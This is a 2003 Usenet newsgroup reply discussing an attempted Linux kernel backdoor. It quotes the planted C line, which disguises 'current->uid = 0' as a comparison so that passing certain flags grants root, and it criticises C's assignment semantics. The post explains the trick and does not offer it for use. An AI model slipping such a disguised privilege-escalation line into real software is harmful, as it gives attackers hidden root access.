From mboxrd@z Thu Jan  1 00:00:00 1970
X-Spam-Checker-Version: SpamAssassin 3.4.4 (2020-01-24) on polar.synack.me
X-Spam-Level: 
X-Spam-Status: No, score=-0.3 required=5.0 tests=BAYES_00,
	REPLYTO_WITHOUT_TO_CC autolearn=no autolearn_force=no version=3.4.4
X-Google-Language: ENGLISH,ASCII-7-bit
X-Google-Thread: 103376,71171f53c22d92b5
X-Google-Attributes: gid103376,public
X-Google-ArrivalTime: 2003-11-11 23:20:01 PST
Path: 
 archiver1.google.com!news2.google.com!news.maxwell.syr.edu!newsfeed.icl.net!newsfeed.fjserv.net!feed.news.nacamar.de!fu-berlin.de!uni-berlin.de!adsl-213-200-246-247.cybernet.CH!not-for-mail
From: Vinzent 'Gadget' Hoefler <ada.rocks@jlfencey.com>
Newsgroups: comp.lang.ada
Subject: Re: C's trikery semantic opens up backdoor in new Linux kernel
Date: Wed, 12 Nov 2003 08:18:27 +0100
Organization: JeLlyFish software
Message-ID: <bosmuu$1hui4o$1@ID-175126.news.uni-berlin.de>
References: <3FB1A63C.9080200@nowhere.com>
 <8Eisb.14119$hB5.9208@nwrdny02.gnilink.net>
 <pan.2003.11.12.05.13.39.401308@Smoke>
Reply-To: v.hoefler@acm.org
NNTP-Posting-Host: adsl-213-200-246-247.cybernet.ch (213.200.246.247)
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
X-Trace: news.uni-berlin.de 1068621600 52381848 213.200.246.247 (16 [175126])
X-Newsreader: Forte Agent 1.8/32.548
Xref: archiver1.google.com comp.lang.ada:2398
Date: 2003-11-12T08:18:27+01:00
List-Id: <comp.lang.ada>

J Cusick wrote:

>On Wed, 12 Nov 2003 04:26:44 +0000, Stephane Richard wrote:
>
>> For some reason, I can't open that link you posted here..
>
>The Register site seems to be down at the moment... The link is good.
>
>The article discusses the fact that someone tried to slide in a C line=20
>(actually 2 lines) that trashed the tcp stack allowing a negative offset

No. It is worse than that.

The interesting line in question is this one:

|if ((options =3D=3D (__WCLONE|__WALL)) && (current->uid =3D 0))

=46irst this looks like a sanity check. But look closer. This single
line serves one single purpose: to give you root-privileges when you
just pass the right flags. Note the "current->uid =3D 0" instead of
"current->uid =3D=3D 0". Who the hell had the fucking bad idea that
assignments could return values?

Let's stretch the example and imagine, it was just a simple typo of a
tired programmer who wrote the PIN-code checking routine for an ATM
and it slipped through the review...


Vinzent.